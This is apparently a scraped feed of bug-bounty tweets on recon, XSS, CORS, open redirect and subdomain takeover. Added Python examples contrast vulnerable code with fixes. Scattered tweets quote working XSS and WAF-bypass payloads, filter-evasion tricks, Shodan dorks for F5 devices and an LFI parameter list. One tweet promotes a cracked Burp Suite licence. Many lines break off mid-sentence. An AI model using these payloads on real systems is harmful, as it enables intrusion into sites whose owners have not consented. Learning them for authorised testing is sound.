RT @thedarkwayg: Initial report: Open Redirect+XSS -> Triaged -> Resolved
Check it again and can still "Open Redirect" -> Report and Bounty
The payload: javascript:@[Link]
Use the ":" character to bypass the filter and "@" to redirect to that domain
#BugBountyTips #BugBounty #ItTakesACrowd [Link]
RT @ryan_kl_ko: #uqcyber PhD student Walt Lin sharing his story on how he discovered a number of CVE
RT @cyberdefender5: Successfully Completed ✌✌🏻✌🏻 #Lookingforward #moretocome
#Thanksalot #Akhilbro #Ersegment #Ethicalhackingtraining #Bugbountyhunting #Cybe
A good way to run linkfinder if you have a list of js files #infosec #bugbounty #bugboun
RT @Sudhans42246878: It's 6:35 in the morning
Couldn't sleep the whole night
And now when I have come to bed ....I still can't sleep because
I am hunting bugs and thinking of all the possible ways I can break into a WebApplicat
Is it a sign I have become one??🙄
#bugbountytips
RT @renniepak: Check for stored XSS in emails. The email itself obviously doesn't trigge
RT @Xer0Days: Changed @0xbharath's VirusTotal sub-domains enumeration script. Crawl all the result p
@appseccouk #bugbountytip #bugbounty #recon #bugbountytips
[Link]
#httpx v0.0.7 updates:-
☑Added TLS Probe (Subdomains from SSL)
☑Added Path/File Request support
☑Added Content-type fingerprinting
☑Added Matcher/Filters for Status Code/Length
[Link]
#hackwithautomation #bugbounty #security #bugbountytips [Link]
RT @INR_0x0Ma5K: My first Hall of Fame for this platform @Bugcrowd, so happy and on the right path to survey. Ple
Most were duplicates. This one is a boosting point for my side.
#bugbountytips #Bounty #hacklearning [Link]
RT @hsakarp_ilajna: #Recon:
1. #Subdomain Scraping- Sublist3r, SubFinder, Amass
2 Subdomain #Bruteforcing- MassDNS with jhaddix_all.txt
3. Subdomain #Permutations scan- #AltDNS
4. #Repeat Step 2 to 3 for 3 times more to find Subs of Subs
#bugbountytips
#cybersecurity #infosec #ethicalhacking
RT @trbughunters: 🚀 CORS Protection RegEx Bypass 🚀
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://
Need to trigger that xss payload, but parens are filtered? EZ!
Function`return alert````${[Link]}`
#xss #payload #filterevasion #bugbountytips #bugbounty
RT @rnd_infosec_guy: Bug bounty tip: don’t tweet useless bug bounty tips
#bugbountytips
RT @dhakal_ananda: Yay! I earned $100 for a 0 user-interaction Account Takeover Vuln
Try re-registering the user with the same email. If the password gets reset, you got the
#bugbounty #bugbountytips
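The re-registration takeover above, as an added example that is not the tweet author's code: a sign-up handler that upserts the user row, so registering the victim's e-mail again silently replaces the victim's password, beside one that never touches an existing account from the sign-up path. The in-memory store, PBKDF2 parameters and response strings are assumptions.

```python
"""Account takeover by re-registering an existing e-mail: the upsert bug and the fix.

Added example for the tip above; not the tweet author's code. The in-memory user
store, the PBKDF2 parameters and the response strings are assumptions.
"""
import hashlib
import hmac
import os
from typing import Dict, Tuple

Users = Dict[str, Tuple[bytes, bytes]]   # email -> (salt, password hash)


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


def register_vulnerable(users: Users, email: str, password: str) -> str:
    """Write-through registration: an existing row is overwritten, so anyone who
    knows the victim's e-mail sets the victim's password with zero interaction."""
    salt = os.urandom(16)
    users[email.lower()] = (salt, _hash(password, salt))
    return "ok"


def register_fixed(users: Users, email: str, password: str) -> str:
    """Never modify an existing account from sign-up. The response is identical
    either way so the endpoint does not double as an e-mail enumeration oracle;
    the existing owner would get a 'someone tried to sign up' mail instead."""
    key = email.lower()
    if key not in users:
        salt = os.urandom(16)
        users[key] = (salt, _hash(password, salt))
    return "ok"


def login(users: Users, email: str, password: str) -> bool:
    entry = users.get(email.lower())
    if entry is None:
        return False
    salt, digest = entry
    return hmac.compare_digest(digest, _hash(password, salt))


if __name__ == "__main__":
    db: Users = {}
    register_fixed(db, "victim@example.test", "victim-pass")        # victim signs up
    register_vulnerable(db, "victim@example.test", "attacker-pass")  # attacker re-registers
    print(login(db, "victim@example.test", "attacker-pass"))        # True: account taken over
```

Same reasoning applies to "update e-mail" and social-login linking flows: any path that can write a credential for an address must first prove the caller controls that address.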
#PmG - Extract parameters/paths from urls
[Link]
#bugbountytips #recon [Link]
Yay, My first writeup
I just published Bypassing OTP via reset password
#bugbountytips #bugbounty
[Link]
Friendly reminder that zdns > massdns #bugbountytips
RT @Jhaddix: Sunday Night #BugBounty #bugbountytips
1 Stored XSS
1 Reflected XSS
1 Admin Panel exposed to interwebz
1 potentially sensitive video exposed to the pub internet
Remember to check/search security-related GitHub issues for the frameworks you run a
RT @ehsayaan: I was very inconsistent about what should I do when hunting on a progr
#bugbounty #bugbountytips [Link]
RT @B3nac: Nice find! 🎉 Here's an adb one-liner to list activities. adb shell dumpsys packa
[Link]
RT @GochaOqradze: Post based Cors misconfiguration PoC
#bugbountytips #bugbountytip [Link]
RT @ArmanSameer95: A Tool to find broken links: Broken Link Checker!
Check this out guys
[Link]
#bugbounty #bugbountytips #Hacking [Link]
RT @scspcommunity: #Bug #Bounty #Tips part 4!
#bugbounty #bugbountytips #ethicalhacking #hacking #pentesting #PenTest #infosec
[Link]
RT @sriramoffcl: Access revoked only on Front-end still vulnerable on Back-end !
#BugBounty #bugbountytips #hackerone #bugcrowd
️RT @trbughunters: ️Top 25 Local File Inclusion (LFI) Parameters 🛡️
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @OAcybersecurity: Hackerone CTF XSS Challenge $250 (BugPoc) 2020 [Link]
RT @ExploitedSystem: Hey Guys Just Uploaded a Video Checking it out would mean alot
#cybersecurity #infosec #bugbounty #bugbountytips #ethicalhacking #hacking #passw
RT @AniruddhaKl: Network Protocols
#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip
RT @AndyInfoSec_: Network Protocols
#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip
Subdomain Takeover 101 ..@EdOverflow Great Blog
learn a lot
[Link]
----
#togatherwelearn #bugbountytips
RT @Akshanshjaiswl: I just published my writeup on Pre-Access to Victim’s Account via
#bugbountytips #bugbountytip #bugbounty #infosec
RT @plenumlab: Very useful tool by @TomNomNom
Feed it urls it will give you a list of interesting ones, at least in theory, [Link]
#BugBounty #bugbountytips
Bypass I learned from @rene_kroka this week:
[Link]
onpointerrawupdate= " A='',B=!A+A,C=!B+A,D=A+{},E=B[A++],F=B[G=A],H=++G+A,
👆 = alert(1)
#bugbounty #bugbountytips
#pentest #pentesting #hacking #bugbounty #bugbountytips #web #KaliLinux #linux #
6 steps and 2 tools to attack JSON Web Token
[Link]
[Link]
#hacktory_tools #bugbounty #cybersecurity #bugbountytip #bugbountytips #cybersec
Cache Poisoning on Wordpress --> Stored XSS --> POST "/wp-admin/[Link]
Triaged as "High" instead of "Critical". Don't know what is wrong!
#bugbountytips Tweet has tip as well :D
@andirrahmani1 #bugbountytips
RT @Digitalsanjog: Content Marketing: India is a country of storytellers. We have storytellers in every field
for more just gaze at
[Link]
#storytelling #contentmarketing #contentstrategy #storyteller #bugbountytips #Conte
RT @Jhaddix: Wednesday Night #BugBounty #bugbountytips
Recording my #hacktivitycon2020 talk tonight, so no hacking. A couple of small updates
RT @ssh0x00r: interested in bug bounty ? (free tip by @NahamSec )
LINK IN BIO
#infosec #cybersecurity #hacking #bugbountytips
RT @ssh0x00r: I've been scratching my head for a long time, thanks @stok @hakluke for the motivation
check this out: [Link]
#hacking #bugbountytips #infosec #motivation
RT @frankmosigisi: What is the best impact if you find
React app api key and want to report it
#bugbounty #bugbountytips
RT @netspooky: #Cloudflare #WAFbypass
Just got a $1000 payout 💵📥
<uu src=@'@' onbigclick=import('//0a"&nbsp;"0a0a?0a/')>mou%09se<|/
#BugBountyTips #bugbountytip #redteam #waf #obfuscation #security #linux #togeth
RT @Nep_1337_1998: To Find #f5 instances
Shodan:
+-+-+-+-+-
F5-Login-Page
WWW-Authenticate: Basic realm=BIG-IP
BigIP
BIG-IP
[Link]:-335242539
[Link]:"BIG-IP&reg;- Redirect"
[Link]
@dnkolegov #bugbountytips #f5 #recon #infosec @vis_hacker [Link]
RT @1m4xx0: [Link]
Made a simple directory search tool using python which will send notification on your Te
Feel free to use the code and modify according to your need!
#BugBounty #bugbountytips #bugbounty #python #redteam
RT @Unknownuser1806: Find #CVEs
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
#bugbounty,#bugbountytips
Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot
#bugbountytips #BugBounty #bugbountytip [Link]
Second medium blog-post:
Stealing your Paytm information using XSS by: @VirenPawar_
[Link]
#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring
#hacking #BugsBunny #bugbountytips #javabug #CVE
Javabug study mini-project
[Link]
RT @pdiscoveryio: Major #update to the public bounty and disclosure programs, we've added almost 200 n
- [Link]
#security #recon #bugbounty #bugbountytips #infosec
“How I Hacked My College’s Online Exam Portal During COVID-19 Quarantine Period” by
#bugbountytips
#xploitprotocol
[Link]
SQLTruncScanner - Scan endpoints for possible SQL Truncation vulnerabilities.
#bugbountytips
#xploitprotocol
[Link]
BurpSuite-Xkeys: A Burp Suite Extension to extract interesting strings (key, secret, toke
#bugbountytips
[Link]
So happy with my HackerOne stats over these past 90 Days! #BugBounty #HackerOne #
#bugbountytips
RT @disclose_io: New VDPs and #bugbounty programs at [Link]
Total: 926
Full safe harbor: 126 (13.6%)
Partial safe harbor: 207 (22.4%)
w/ Bounties: 399 (43.1%)
w/ HOF: 593 (64.0%)
w/ Swag: 45 (4.9%)
Missing yours? Submit a PR!
#bugbountytips #infosec #cybersecurity
The biggest takeaways from most talks are things I am already biased towards. Unlearn
RT @scspcommunity: #bugbounty tips part 2
#hacking #ethicalhacking #bugbounty #bugbountytip #securitytesting #webapp #pent
[Link]
RT @scspcommunity: Bug Bounty Tips part 3
#bugbountytip #bugbountytips #bugbounty #bughunting #bughunter #hackerone #bug
RT @scspcommunity: Take your #bugbounty game to a higher level with the Bug Bounty
#Pentesting #infosec #cybersecurity #informationsecurity #hacking #ethicalhacker #e
RT @BugBountyWeekly: You can use @hackvertor to generate random IP to bypass rate-
RT @scspcommunity: A little treasure for all you #BugBounty Hunters! 😉
#infosec #informationsecurity #infosecurity #CyberSecurity #cyber #cybersec #PenTes
HOURS & HOURS OF FREE CYBER SECURITY TRAINING??? (I'm losing it) [Link]
August is going to be.. crazy!
feat: @Hacker0x01 @defcon @redteamvillage @AppSec_Village @Bugcrowd @secarmyof
#bugbounty #bugbountytips #appsec #infosec [Link]
RT @william_leeser: #bugbountytips #BugBounty If you are starting now and don't have
This is a short survey by @AndyInfoSec_ to learn about bug bounty hunting preferences
[Link]
#infosec #bugbounty #bugbountytips #vapt #cybersec #Hacker #togetherwehitharder
this is baller #bugbountytips [Link]
Technique, Tool and Lecture (TTL) #20
-
-
🤓 Follow @gainsec
-
[Link]
-
#Hacking #ethicalhacker #bugbountytips #infosec #pentesting #pentester #cybersecu
RT @FindomainApp: If you're using our services, look for "CODE: 502" and "ERROR: The
RT @mehmetcangunes: I was included in the Hall of Fame by GOOGLE😀
[Link]
#bugbounty #infosec #ethicalhacking #CyberSecurity #halloffame #bugbountytips http
RT @_Y000_: Xss payload
-->'"<h1><img src="/" =_=" title="onerror='javascript=pr\u006fmpt`_Y000
#payload #xss #bugbountytips [Link]
RT @TheJulfikar: extract endpoints from JavaScript files by @renniepak
cat [Link] | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s
#bugbountytips #bugbountytip #bugbounty [Link]
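The grep/sed one-liner above done in Python, as an added example that is not the tweet authors' code and goes slightly further: it also catches single-quoted strings and the relative "./" and "../" forms, and then resolves each hit against the script's own URL using the root/current/parent rules from the path notes earlier on this page. JS_URL and SAMPLE_JS are constructed.

```python
"""Pull quoted paths out of a JavaScript bundle and resolve them against the script's URL.

Added example; it generalises the grep/sed one-liner above and applies the path
notes from earlier on this page. Not the tweet authors' code. JS_URL and
SAMPLE_JS are constructed.
"""
import re
from typing import List
from urllib.parse import urljoin

JS_URL = "https://app.example.test/static/js/app.bundle.js"   # assumption: where the bundle was fetched from

SAMPLE_JS = r"""
fetch("/api/v1/users?id=1&role=admin");
axios.get("/api/v1/orders/");
var logo = "./assets/logo.png";
var cfg = "../config/settings.json";
var back = "../../internal/health";
$.post('/api/v1/login', data);          // single quotes: skipped by the one-liner
fetch("/api/v1/users?id=1&role=admin"); // duplicate, kept once
"""

# A quote, then "/", "./" or "../", then the characters the one-liner allowed plus . - %
PATH_RE = re.compile(r"""(["'])((?:\.{0,2}/)[A-Za-z0-9_./?=&%-]*)\1""")


def extract_paths(js: str) -> List[str]:
    """Ordered, de-duplicated list of path-looking string literals."""
    seen, out = set(), []
    for _, path in PATH_RE.findall(js):
        if path not in seen:
            seen.add(path)
            out.append(path)
    return out


def resolve_paths(js_url: str, paths: List[str]) -> List[str]:
    """'/x' is root-relative, './x' sits beside the script and '../x' one
    directory up, exactly as in the path notes; urljoin applies those rules."""
    return [urljoin(js_url, p) for p in paths]


if __name__ == "__main__":
    for url in resolve_paths(JS_URL, extract_paths(SAMPLE_JS)):
        print(url)
```

Resolving relative paths against the script URL rather than the site root is the difference between probing /static/config/settings.json and wrongly probing /config/settings.json; bundlers also commonly emit template strings and concatenated paths, which no quote-delimited regex will see.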
RT @UrielYochpaz: I can upload any file to a Jetty server,
but when I try uploading JSP files I get an error: "Could not initialize [Link]..."
Any help?
#bugbountytips
RT @hsakarp_ilajna: #IDOR_TIPS
[Link] URLs of the application from the Wayback Machine using a wayback script.
[Link] a script with a custom wordlist to fuzz the obtained URLs.
3. One of them leaked sensitive content based on #application's workflow.
#bugbountytips #bugbounty #infosec #cybersecurity
RT @bountyhunter_fr: Password reset function token leak
After sending the password reset request, sometimes the reset token is leaked in the HT
#bugbountytips
RT @EvMd15: #bugbountytips #wordpresssecurity #wordpress
List backup file wp-config [Link]
RT @chiraggupta8769: #FREE 2ಠ2ಠ ♥
Burp Suite Professional Edition v2020.7 x64 Full Activated + All Addons – Discount 100%
By @3XS0
Link : [Link]
#BurpSuite #bugbounty #bugbountytips [Link]
RT @Jhaddix: Tuesday Night #BugBounty #bugbountytips
Spent about 3 hours hunting. Didn't find anything.
RT @aish_kendle: Last week, collaborated with @thakare_prateek and hijacked 24+ sub
Some tips :
-Enumerate subdomains from multiple tools
-Do check the 404 pages
-Check the cname record
-Automate everything
#bugbounty #bugbountytips #recon [Link]
RT @pdnuclei: # Nuclei templates v2.0.6 updates.
- More CVEs.
- More takeovers.
- More workflows.
[Link]
Shout out to @dwisiswant0, @EdOverflow, adiffpirate, ankh2054,@nahoragg, @Marmela
#infosec #hackwithautomation #bugbountytips #pentest #cybersecurity [Link]
RT @JaggarHenry: Automating thousands of subdomain takeovers for fun and for profit.
[Link] [Link]
RT @r0bre: Today I'm releasing JSMon, an automated JS file change monitor for #bugbo
[Link]
Big thanks to @EdOverflow @Yassineaboukir for inspiring this & @TomNomNom @s
#bugbountytip #bugbountytips #hacking #infosec #recon [Link]
RT @ceos3c: Let's talk about UFW and VPS. Ethical Hacking Diaries #10 now up (video w
[Link]
#linux #cybersecurityawareness #cybersecurity #itsecurity #bugbounty #openbugbou
RT @Tismayil1: Yes, I was awarded $2200 in a private program.
USED Repos
Port Scan : [Link]
DirSearch : [Link]
Backup Scanner : [Link]
#BugBounty #bugbountytip #bugbountytips #WhiteHats [Link]
RT @t1nd19d: If you're looking for flexibility when doing offensive forensics or data manipulation, master regex
#bugbountytips #BugBounty
CORS vulnerability
[Link] not working? Try with [Link]
Sometimes the check is only on the domain name without the top level domain that you
#bugbountytips
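The CORS check described above (a name matched without its TLD, and the regex bypass a few tweets earlier), as an added example that is not the tweet authors' code: the loose pattern beside a check that parses the Origin and compares whole host labels, and a response builder that reflects only an allowed Origin. TRUSTED and the sample origins are assumptions.

```python
"""CORS origin check: the loose regex the tips above bypass, and a parsed allowlist check.

Added example, not the tweet authors' code. The trusted domain and the sample
Origin values are assumptions.
"""
import re
from typing import Dict
from urllib.parse import urlsplit

TRUSTED = "target.test"   # assumption: the site's own registrable domain

# Name checked without its TLD and without anchoring the end of the host.
LOOSE_RE = re.compile(r"^https://([a-z0-9-]+\.)*target")


def origin_allowed_loose(origin: str) -> bool:
    return LOOSE_RE.match(origin) is not None


def origin_allowed_strict(origin: str) -> bool:
    """Parse the Origin, then compare whole labels: the host is TRUSTED itself or
    a subdomain of it, over https, with no userinfo or trailing path."""
    parts = urlsplit(origin)
    host = parts.hostname or ""
    if parts.scheme != "https" or parts.path not in ("", "/") or parts.query or "@" in parts.netloc:
        return False
    return host == TRUSTED or host.endswith("." + TRUSTED)


def cors_headers(origin: str) -> Dict[str, str]:
    """Reflect only an allowed Origin, never '*' together with credentials."""
    if not origin_allowed_strict(origin):
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }


if __name__ == "__main__":
    for o in ("https://api.target.test", "https://target.attacker.test",
              "https://targetevil.test", "https://target.evil", "http://target.test", "null"):
        print(f"{o:32} loose={origin_allowed_loose(o)!s:5} strict={origin_allowed_strict(o)}")
```

The subdomain wildcard in the strict check is still a wide trust boundary: an XSS on any subdomain becomes a credentialed cross-origin read, so where the consumers are known, replace it with an explicit set of origins.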
Bash code for manual subdomain takeover testing:
cat [Link] | xargs -n1 dig @[Link] | grep -A10 NXDO | grep CNAME
#BugBounty #bugbountytips #bugbountytip @hacktivist1337
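What the dig one-liner above greps for, as an added example that is not the tweet author's code: each dig response is parsed on its own, and a name is reported only when the status is NXDOMAIN and the answer section carries a CNAME, which is the precondition the `grep -A10 NXDO | grep CNAME` pipeline approximates. SAMPLE_DIG is constructed output in dig's default format for two queries; the domain names in it are made up.

```python
"""Pick NXDOMAIN+CNAME candidates out of dig output, the check the one-liner above greps for.

Added example, not the tweet author's code. SAMPLE_DIG is constructed dig output
for two queries (the resolver and list file from the one-liner are not needed
offline); every domain name in it is made up.
"""
import re
from typing import List, Tuple

SAMPLE_DIG = """\
; <<>> DiG 9.16.1 <<>> shop.example.test
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 4242
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;shop.example.test.\t\tIN\tA

;; ANSWER SECTION:
shop.example.test.\t300\tIN\tCNAME\texample-shop.hosting-vendor.test.

;; AUTHORITY SECTION:
hosting-vendor.test.\t900\tIN\tSOA\tns1.hosting-vendor.test. hostmaster.hosting-vendor.test. 1 7200 900 1209600 86400

; <<>> DiG 9.16.1 <<>> www.example.test
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4243
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

;; ANSWER SECTION:
www.example.test.\t300\tIN\tCNAME\tedge.cdn-vendor.test.
edge.cdn-vendor.test.\t60\tIN\tA\t192.0.2.10
"""

STATUS_RE = re.compile(r"status: ([A-Z]+)")
CNAME_RE = re.compile(r"^(\S+)\s+\d+\s+IN\s+CNAME\s+(\S+)", re.M)


def split_responses(output: str) -> List[str]:
    """xargs -n1 dig concatenates one response per query; split on dig's banner."""
    chunks = re.split(r"(?m)^; <<>> DiG", output)
    return [c for c in chunks if c.strip()]


def takeover_candidates(output: str) -> List[Tuple[str, str]]:
    """(name, cname_target) pairs whose lookup ended in NXDOMAIN: the alias is
    still published but nothing answers for its target, which is the precondition
    for a takeover when the target belongs to a service that lets anyone claim it."""
    found = []
    for chunk in split_responses(output):
        status = STATUS_RE.search(chunk)
        if not status or status.group(1) != "NXDOMAIN":
            continue
        for name, target in CNAME_RE.findall(chunk):
            found.append((name.rstrip("."), target.rstrip(".")))
    return found


if __name__ == "__main__":
    for name, target in takeover_candidates(SAMPLE_DIG):
        print(f"{name} -> {target}  (NXDOMAIN: check whether {target.split('.', 1)[1]} allows claiming it)")
```

NXDOMAIN plus a dangling CNAME is a lead, not a finding: confirm that the target's provider actually lets a new customer register that exact name, and keep any proof of concept to a harmless page that the program can verify.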
RT @xerosecurity: Stay up-to-date with the latest emerging security threats, vulnerabili
#hackers #hacking #bugbounty #bugbountytips #pentesting #pentest #redteam #OSIN
RT @TrainingBug: XSS COOKIE STEALING
[Link]
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
RT @TrainingBug: XSS on non existent parameters
[Link]
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
One-line bash script to get every domain on a specific IP
curl -s -k -X $'GET' -H $'Host: [Link] --url '[Link]
#bugbountytips #bugbountytip @rapiddns
RT @Shivam31200: A short p1 story inspired by
@ADITYASHENDE17 @Shubham_4500
#bugbounty #bugbountytips [Link]
📡via @securityweekly -pod w/ research recognition 2 @steventseeley 4 @SharePoint R
[Link]
#BugBounty #bugbountytips #bugbountytip #Cyber #Security #CyberSecurity #Podcas
RT @ome_mishra: Just scored a bounty of €1000 @intigriti, check my profile: [Link]
#HackWithIntigriti
#bugbountytips
Always try to understand the application; you will get something cool.... 🤘🏻
RT @CyberRitesh: #Day11 #Challenge365
1) Critical File Found
2) Source Code Disclosure
3) #tryhackme Challenges
4) WriteUps reading on #bugbounty
#bugbountytips #CyberSecurity
RT @InsiderPhD: New video!
This week we're answering a question: How do the pros find those CVEs before anyone e
#BugBounty #bugbountytips
[Link] [Link]